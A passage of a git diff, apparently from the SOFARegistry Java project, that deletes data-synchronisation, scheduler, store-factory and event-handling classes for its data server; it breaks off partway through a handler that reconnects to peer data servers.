- } - } - - Operator previousOperator = logOperators.put(operator.getVersion(), operator); - if (previousOperator == null) { - logOperatorsOrder.add(operator.getVersion()); - } else { - LOGGER.warn("Append operation has been exist!"); - } - } finally { - write.unlock(); - } - } - - /** - * - * @return - */ - public Collection getAllOperators() { - LinkedList linkRet = new LinkedList<>(); - if (logOperatorsOrder.peek() != null) { - Iterator iterator = logOperatorsOrder.iterator(); - while (iterator.hasNext()) { - Long i = (Long) iterator.next(); - linkRet.add(logOperators.get(i)); - } - } - return linkRet; - } - - /** - * process send data current version,check current version exist in current queue - * if(existed) return operators which version bigger than current version - * else get all datum data operators - * - * @param currentVersion - * @return - */ - public SyncData process(Long currentVersion) { - read.lock(); - try { - Collection operators = acceptOperator(currentVersion); - - List retList = new LinkedList<>(); - SyncData syncData; - boolean wholeDataTag = false; - if (operators != null) { - //first get all data - if (operators.isEmpty()) { - wholeDataTag = true; - retList.add(DatumCache.get(dataCenter, dataInfoId)); - LOGGER.info("Get all data!dataInfoID:{} dataCenter:{}.All data size{}:", - dataInfoId, dataCenter, retList.size()); - } else { - for (Operator operator : operators) { - retList.add(operator.getDatum()); - } - } - syncData = new SyncData(dataInfoId, dataCenter, wholeDataTag, retList); - } else { - //no match get all data - LOGGER - .info( - "Append log queue is empty,Maybe all logs record expired or no operator append!So must get all data!dataInfoID:{} dataCenter:{}.queue size{}:", - dataInfoId, dataCenter, logOperatorsOrder.size()); - wholeDataTag = true; - retList.add(DatumCache.get(dataCenter, dataInfoId)); - syncData = new SyncData(dataInfoId, dataCenter, wholeDataTag, retList); - } - - return syncData; - } finally { - read.unlock(); - } - } - - /** - * - * @param currentVersion - * @return - */ - public Collection acceptOperator(Long currentVersion) { - //first get all data - if (currentVersion == null) { - LOGGER - .info( - "Current version input is null,maybe first get all data!dataInfoID:{} dataCenter:{}", - dataInfoId, dataCenter); - return new ArrayList<>(); - } - - if (logOperatorsOrder.size() > 0) { - LinkedList linkRet = new LinkedList<>(); - //target version found - if (logOperatorsOrder.contains(currentVersion)) { - Iterator iterator = logOperatorsOrder.descendingIterator(); - while (iterator.hasNext()) { - Long i = (Long) iterator.next(); - if (currentVersion.equals(i)) { - break; - } - linkRet.addFirst(logOperators.get(i)); - } - } else { - //target version not found,but source version equals - Operator headOperator = logOperators.get(logOperatorsOrder.peek()); - if (currentVersion.equals(headOperator.getSourceVersion())) { - LOGGER - .info("current version not found on queue,but header source version equals current version!"); - linkRet.addAll(logOperators.values()); - } - } - if (linkRet.isEmpty()) { - LOGGER.info("Current version {} not match on queue,queue size {} !", - currentVersion, logOperatorsOrder.size()); - } - return linkRet; - } - //cannot match version,must poll all data - return null; - } - - /** - * - * @param durationSEC - */ - public void checkExpired(int durationSEC) { - write.lock(); - try { - //check all expired - Long peekVersion = logOperatorsOrder.peek(); - if (peekVersion != null && isExpired(durationSEC, peekVersion)) { - logOperators.remove(logOperatorsOrder.poll()); - checkExpired(durationSEC); - } - } finally { - write.unlock(); - } - } - - /** - * - * @return - */ - public Long getLastVersion() { - return logOperatorsOrder.peekLast(); - } - - private boolean isFull() { - return logOperators.size() >= maxBufferSize; - } - - private boolean isExpired(int durationSECS, long peekVersion) { - durationSECS = (durationSECS > 0) ? durationSECS * 1000 : DEFAULT_DURATION_SECS * 1000; - boolean ret = System.currentTimeMillis() > peekVersion + durationSECS; - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("now:" + System.currentTimeMillis() + " peek:" + peekVersion + " du:" - + durationSECS + " result:" + ret); - } - return ret; - } - - private void clearBefore() { - write.lock(); - try { - - logOperators.clear(); - logOperatorsOrder.clear(); - } finally { - write.unlock(); - } - } - - /** - * - */ - public void printInfo() { - LOGGER - .debug("----------------------------------------------------------------------------"); - LOGGER.debug("Acceptor info has " + logOperators.size() + " operations,dataInfoID:" - + this.getDataInfoId() + " dataCenter:" + this.getDataCenter()); - if (logOperatorsOrder.size() > 0) { - for (Long version : logOperatorsOrder) { - Operator operator = logOperators.get(version); - LOGGER.debug("| " + pidLine(String.valueOf(operator.getVersion()), 24, " ") - + pidLine(String.valueOf(operator.getSourceVersion()), 24, " ") - + operator.getDatum()); - - } - } - } - - private String pidLine(String line, int length, String space) { - StringBuilder sb = new StringBuilder(); - sb.append(line); - int spaces = length - line.getBytes(Charset.defaultCharset()).length - 1; - for (int i = 0; i < spaces; i++) { - sb.append(space); - } - return sb.toString(); - } - - /** - * Getter method for property dataInfoId. - * - * @return property value of dataInfoId - */ - public String getDataInfoId() { - return dataInfoId; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/LocalAcceptorStore.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/LocalAcceptorStore.java deleted file mode 100644 index 85d2e3292..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/LocalAcceptorStore.java +++ /dev/null @@ -1,49 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync.sync; - -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.node.DataServerNode; - -import java.util.ArrayList; -import java.util.List; -import java.util.stream.Collectors; - -/** - * - * @author shangyu.wh - * @version $Id: LocalAcceptorStore.java, v 0.1 2018-03-22 12:31 shangyu.wh Exp $ - */ -public class LocalAcceptorStore extends AbstractAcceptorStore { - @Override - public String getType() { - return DataSourceTypeEnum.BACKUP.toString(); - } - - @Override - public List getTargetDataIp(String dataInfoId) { - - List ips = new ArrayList<>(); - List dataServerNodes = metaServerService - .getDataServers(getDataServerConfig().getLocalDataCenter(), dataInfoId); - if (dataServerNodes != null && !dataServerNodes.isEmpty()) { - ips = dataServerNodes.stream().map(DataServerNode::getIp).collect(Collectors.toList()); - } - - return ips; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/Scheduler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/Scheduler.java deleted file mode 100644 index 28b3d0b2b..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/Scheduler.java +++ /dev/null @@ -1,87 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync.sync; - -import com.alipay.sofa.registry.server.data.datasync.AcceptorStore; -import com.alipay.sofa.registry.task.scheduler.TimedSupervisorTask; -import com.alipay.sofa.registry.util.NamedThreadFactory; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.concurrent.ExecutorService; -import java.util.concurrent.LinkedBlockingQueue; -import java.util.concurrent.ScheduledExecutorService; -import java.util.concurrent.ScheduledThreadPoolExecutor; -import java.util.concurrent.SynchronousQueue; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: Scheduler.java, v 0.1 2018-03-07 16:07 shangyu.wh Exp $ - */ -public class Scheduler { - - public final ExecutorService versionCheckExecutor; - private final ScheduledExecutorService scheduler; - private final ThreadPoolExecutor expireCheckExecutor; - - @Autowired - private AcceptorStore localAcceptorStore; - - /** - * constructor - */ - public Scheduler() { - scheduler = new ScheduledThreadPoolExecutor(4, new NamedThreadFactory("SyncDataScheduler")); - - expireCheckExecutor = new ThreadPoolExecutor(1, 3, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("SyncDataScheduler-expireChangeCheck")); - - versionCheckExecutor = new ThreadPoolExecutor(2, 2, 0L, TimeUnit.MILLISECONDS, - new LinkedBlockingQueue<>(), new NamedThreadFactory( - "SyncDataScheduler-versionChangeCheck")); - - } - - /** - * start scheduler - */ - public void startScheduler() { - - scheduler.schedule( - new TimedSupervisorTask("FetchDataLocal", scheduler, expireCheckExecutor, 3, - TimeUnit.SECONDS, 10, () -> localAcceptorStore.checkAcceptorsChangAndExpired()), - 30, TimeUnit.SECONDS); - - - versionCheckExecutor.execute(() -> localAcceptorStore.changeDataCheck()); - - } - - /** - * stop scheduler - */ - public void stopScheduler() { - if (scheduler != null && !scheduler.isShutdown()) { - scheduler.shutdown(); - } - if (versionCheckExecutor != null && !versionCheckExecutor.isShutdown()) { - versionCheckExecutor.shutdown(); - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/StoreServiceFactory.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/StoreServiceFactory.java deleted file mode 100644 index 3dcbb0f0c..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/StoreServiceFactory.java +++ /dev/null @@ -1,51 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync.sync; - -import com.alipay.sofa.registry.server.data.datasync.AcceptorStore; -import org.springframework.beans.BeansException; -import org.springframework.context.ApplicationContext; -import org.springframework.context.ApplicationContextAware; - -import java.util.HashMap; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: StoreServiceFactory.java, v 0.1 2018-03-22 15:49 shangyu.wh Exp $ - */ -public class StoreServiceFactory implements ApplicationContextAware { - - private static Map storeServiceMap = new HashMap<>(); - - /** - * get AcceptorStore by storeType - * @param storeType - * @return - */ - public static AcceptorStore getStoreService(String storeType) { - return storeServiceMap.get(storeType); - } - - @Override - public void setApplicationContext(ApplicationContext applicationContext) throws BeansException { - Map map = applicationContext.getBeansOfType(AcceptorStore.class); - - map.forEach((key, value) -> storeServiceMap.put(value.getType(), value)); - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/SyncDataServiceImpl.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/SyncDataServiceImpl.java deleted file mode 100644 index dd0f01389..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/datasync/sync/SyncDataServiceImpl.java +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.datasync.sync; - -import com.alipay.sofa.registry.common.model.dataserver.SyncData; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.datasync.AcceptorStore; -import com.alipay.sofa.registry.server.data.datasync.Operator; -import com.alipay.sofa.registry.server.data.datasync.SyncDataService; - -/** - * - * @author shangyu.wh - * @version $Id: SyncDataService.java, v 0.1 2018-03-07 16:13 shangyu.wh Exp $ - */ -public class SyncDataServiceImpl implements SyncDataService { - - private static final Logger LOGGER = LoggerFactory.getLogger(SyncDataServiceImpl.class, - "[SyncDataService]"); - - @Override - public void appendOperator(Operator operator) { - AcceptorStore acceptorStore = StoreServiceFactory.getStoreService(operator.getSourceType() - .toString()); - if (acceptorStore != null) { - acceptorStore.addOperator(operator); - } else { - LOGGER.error("Can't find acceptor store type {} to Append operator!", - operator.getSourceType()); - throw new RuntimeException("Can't find acceptor store to Append operator!"); - } - } - - @Override - public SyncData getSyncDataChange(SyncDataRequest syncDataRequest) { - AcceptorStore acceptorStore = StoreServiceFactory.getStoreService(syncDataRequest - .getDataSourceType()); - if (acceptorStore != null) { - return acceptorStore.getSyncData(syncDataRequest); - } else { - LOGGER.error("Can't find acceptor store type {} to get sync Data!", - syncDataRequest.getDataSourceType()); - throw new RuntimeException("Can't find acceptor store to get sync Data!"); - } - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/DataServerChangeEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/DataServerChangeEvent.java deleted file mode 100644 index a41dfd113..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/DataServerChangeEvent.java +++ /dev/null @@ -1,66 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.server.data.cache.DataServerChangeItem; - -import java.util.HashMap; -import java.util.Map; - -/** - * - * @author qian.lqlq - * @version $Id: DataServerChangeEvent.java, v 0.1 2018-03-13 14:37 qian.lqlq Exp $ - */ -public class DataServerChangeEvent { - - private DataServerChangeItem dataServerChangeItem; - - /** - * constructor - * @param dataServerChangeItem - */ - public DataServerChangeEvent(DataServerChangeItem dataServerChangeItem) { - this.dataServerChangeItem = dataServerChangeItem; - } - - /** - * constructor - * @param serverMap - * @param versionMap - */ - public DataServerChangeEvent(Map> serverMap, - Map versionMap) { - if (serverMap == null) { - serverMap = new HashMap<>(); - } - if (versionMap == null) { - versionMap = new HashMap<>(); - } - this.dataServerChangeItem = new DataServerChangeItem(serverMap, versionMap); - } - - /** - * Getter method for property dataServerChangeItem. - * - * @return property value of dataServerChangeItem - */ - public DataServerChangeItem getDataServerChangeItem() { - return dataServerChangeItem; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/EventCenter.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/EventCenter.java deleted file mode 100644 index 3e5dd8daf..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/EventCenter.java +++ /dev/null @@ -1,53 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event; - -import com.alipay.sofa.registry.server.data.event.handler.AbstractEventHandler; - -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; - -/** - * - * @author qian.lqlq - * @version $Id: EventCenter.java, v 0.1 2018-03-13 14:41 qian.lqlq Exp $ - */ -public class EventCenter { - - private final Map MAP = new ConcurrentHashMap<>(); - - /** - * eventHandler register - * @param handler - */ - public void register(AbstractEventHandler handler) { - MAP.put(handler.interest(), handler); - } - - /** - * event handler handle process - * @param event - */ - public void post(Object event) { - Class clazz = event.getClass(); - if (MAP.containsKey(clazz)) { - MAP.get(clazz).handle(event); - } else { - throw new RuntimeException("no suitable handler was found:" + clazz); - } - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/LocalDataServerChangeEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/LocalDataServerChangeEvent.java deleted file mode 100644 index 100af3482..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/LocalDataServerChangeEvent.java +++ /dev/null @@ -1,90 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event; - -import com.alipay.sofa.registry.common.model.metaserver.DataNode; - -import java.util.Map; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: LocalDataServerChangeEvent.java, v 0.1 2018-05-07 20:13 qian.lqlq Exp $ - */ -public class LocalDataServerChangeEvent { - - private Map localDataServerMap; - - private long localDataCenterversion; - - private Set newJoined; - - private long version; - - /** - * constructor - * @param localDataServerMap - * @param newJoined - * @param version - * @param localDataCenterversion - */ - public LocalDataServerChangeEvent(Map localDataServerMap, - Set newJoined, long version, - long localDataCenterversion) { - this.localDataServerMap = localDataServerMap; - this.newJoined = newJoined; - this.version = version; - this.localDataCenterversion = localDataCenterversion; - } - - /** - * Getter method for property localDataServerMap. - * - * @return property value of localDataServerMap - */ - public Map getLocalDataServerMap() { - return localDataServerMap; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public long getVersion() { - return version; - } - - /** - * Getter method for property newJoined. - * - * @return property value of newJoined - */ - public Set getNewJoined() { - return newJoined; - } - - /** - * Getter method for property localDataCenterversion. - * - * @return property value of localDataCenterversion - */ - public long getLocalDataCenterversion() { - return localDataCenterversion; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/MetaServerChangeEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/MetaServerChangeEvent.java deleted file mode 100644 index d726eb664..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/MetaServerChangeEvent.java +++ /dev/null @@ -1,47 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event; - -import java.util.Map; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: MetaServerChangeEvent.java, v 0.1 2018-03-13 15:31 qian.lqlq Exp $ - */ -public class MetaServerChangeEvent { - - private Map> ipMap; - - /** - * constructor - * @param ipMap - */ - public MetaServerChangeEvent(Map> ipMap) { - this.ipMap = ipMap; - } - - /** - * Getter method for property ipMap. - * - * @return property value of ipMap - */ - public Map> getIpMap() { - return ipMap; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/StartTaskEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/StartTaskEvent.java deleted file mode 100644 index f49f3c01a..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/StartTaskEvent.java +++ /dev/null @@ -1,39 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event; - -/** - * - * @author qian.lqlq - * @version $Id: StartTaskEvent.java, v 0.1 2018-03-13 15:13 qian.lqlq Exp $ - */ -public class StartTaskEvent { - - private static final StartTaskEvent INSTANCE = new StartTaskEvent(); - - private StartTaskEvent() { - } - - /** - * get instance of StartTaskEvent - * @return - */ - public static StartTaskEvent getInstance() { - return INSTANCE; - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/AbstractEventHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/AbstractEventHandler.java deleted file mode 100644 index e33401b61..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/AbstractEventHandler.java +++ /dev/null @@ -1,57 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event.handler; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.event.EventCenter; -import org.springframework.beans.factory.InitializingBean; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author qian.lqlq - * @version $Id: AbstractEventHandler.java, v 0.1 2018-03-13 15:34 qian.lqlq Exp $ - */ -public abstract class AbstractEventHandler implements InitializingBean { - - private static final Logger LOGGER = LoggerFactory.getLogger(AbstractEventHandler.class); - - @Autowired - private EventCenter eventCenter; - - @Override - public void afterPropertiesSet() throws Exception { - eventCenter.register(this); - } - - /** - * event handle func - * @param event - */ - public void handle(T event) { - try { - doHandle(event); - } catch (Exception e) { - LOGGER.error("[{}] handle event error", this.getClass().getSimpleName(), e); - } - } - - public abstract Class interest(); - - public abstract void doHandle(T event); -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/DataServerChangeEventHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/DataServerChangeEventHandler.java deleted file mode 100644 index 931877b03..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/event/handler/DataServerChangeEventHandler.java +++ /dev/null @@ -1,209 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.event.handler; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.DataServerCache; -import com.alipay.sofa.registry.server.data.cache.DataServerChangeItem; -import com.alipay.sofa.registry.server.data.event.DataServerChangeEvent; -import com.alipay.sofa.registry.server.data.event.EventCenter; -import com.alipay.sofa.registry.server.data.event.LocalDataServerChangeEvent; -import com.alipay.sofa.registry.server.data.node.DataServerNode; -import com.alipay.sofa.registry.server.data.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerNodeFactory; -import com.alipay.sofa.registry.server.data.util.TimeUtil; -import org.apache.commons.lang.StringUtils; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.util.CollectionUtils; - -import java.util.HashSet; -import java.util.Map; -import java.util.Map.Entry; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; - -/** - * - * @author qian.lqlq - * @version $Id: DataServerChangeEventHandler.java, v 0.1 2018-03-13 14:38 qian.lqlq Exp $ - */ -public class DataServerChangeEventHandler extends AbstractEventHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DataServerChangeEventHandler.class); - - private static final int TRY_COUNT = 5; - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private DataServerCache dataServerCache; - - @Autowired - private DataNodeExchanger dataNodeExchanger; - - @Autowired - private EventCenter eventCenter; - - @Override - public Class interest() { - return DataServerChangeEvent.class; - } - - @Override - public void doHandle(DataServerChangeEvent event) { - synchronized (this) { - //register self first,execute once - DataServerNodeFactory.initConsistent(dataServerBootstrapConfig); - - DataServerChangeItem dataServerChangeItem = event.getDataServerChangeItem(); - Set localDataServers = dataServerCache.getDataServers( - dataServerBootstrapConfig.getLocalDataCenter()).keySet(); - //get changed dataservers - Map> changedMap = dataServerCache - .compareAndSet(dataServerChangeItem); - if(!changedMap.isEmpty()) { - for (Entry> changeEntry : changedMap.entrySet()) { - String dataCenter = changeEntry.getKey(); - Set ips = changeEntry.getValue(); - if (!CollectionUtils.isEmpty(ips)) { - for (String ip : ips) { - if (!StringUtils.equals(ip, DataServerConfig.IP)) { - DataServerNode dataServerNode = DataServerNodeFactory - .getDataServerNode(dataCenter, ip); - if (dataServerNode == null || dataServerNode.getConnection() == null - || !dataServerNode.getConnection().isFine()) { - connectDataServer(dataCenter, ip); - } - } - } - //remove all old DataServerNode not in change map - Set ipSet = DataServerNodeFactory.getIps(dataCenter); - for (String ip : ipSet) { - if (!ips.contains(ip)) { - DataServerNodeFactory.remove(dataCenter, ip, dataServerBootstrapConfig); - LOGGER.info( - "[DataServerChangeEventHandler] remove connection, datacenter:{}, ip:{}", - dataCenter, ip); - } - } - - Long newVersion = dataServerCache.getDataCenterNewVersion(dataCenter); - Map newDataNodes = dataServerCache.getNewDataServerMap(dataCenter); - //if the datacenter is self, post LocalDataServerChangeEvent - if (dataServerBootstrapConfig.getLocalDataCenter().equals(dataCenter)) { - Set newjoined = new HashSet<>(ips); - newjoined.removeAll(localDataServers); - //avoid input map reference operation DataServerNodeFactory MAP - Map map = new ConcurrentHashMap<>(newDataNodes); - - LOGGER.info("Node list change fire LocalDataServerChangeEvent,current node list={},version={}", - map.keySet(), newVersion); - eventCenter.post(new LocalDataServerChangeEvent(map, newjoined, - dataServerChangeItem.getVersionMap() - .get(dataServerBootstrapConfig.getLocalDataCenter()), - newVersion)); - } else { - dataServerCache.updateItem(newDataNodes, newVersion, dataCenter); - } - } else { - //if the datacenter which has no dataservers is not self, remove it - if (!dataServerBootstrapConfig.getLocalDataCenter().equals(dataCenter)) { - removeDataCenter(dataCenter); - } - Long newVersion = dataServerCache.getDataCenterNewVersion(dataCenter); - Map newDataNodes = dataServerCache.getNewDataServerMap(dataCenter); - dataServerCache.updateItem(newDataNodes, newVersion, dataCenter); - } - } - } else { - //refresh for keep connect - Set allDataCenter = new HashSet<>(DataServerNodeFactory.getAllDataCenters()); - for (String dataCenter:allDataCenter) { - Map dataNodes = DataServerNodeFactory.getDataServerNodes(dataCenter); - if(dataNodes != null && !dataNodes.isEmpty()){ - - dataNodes.forEach((ip,dataServerNode)->{ - if (!StringUtils.equals(ip, DataServerConfig.IP)) { - Connection connection = dataServerNode.getConnection(); - if (connection != null && !connection.isFine()) { - LOGGER.warn("[DataServerChangeEventHandler] dataServer connections is not fine,try to reconnect it,old connection={},dataCenter={}", - connection.getRemoteAddress(), dataCenter); - connectDataServer(dataCenter, ip); - } - } - }); - } 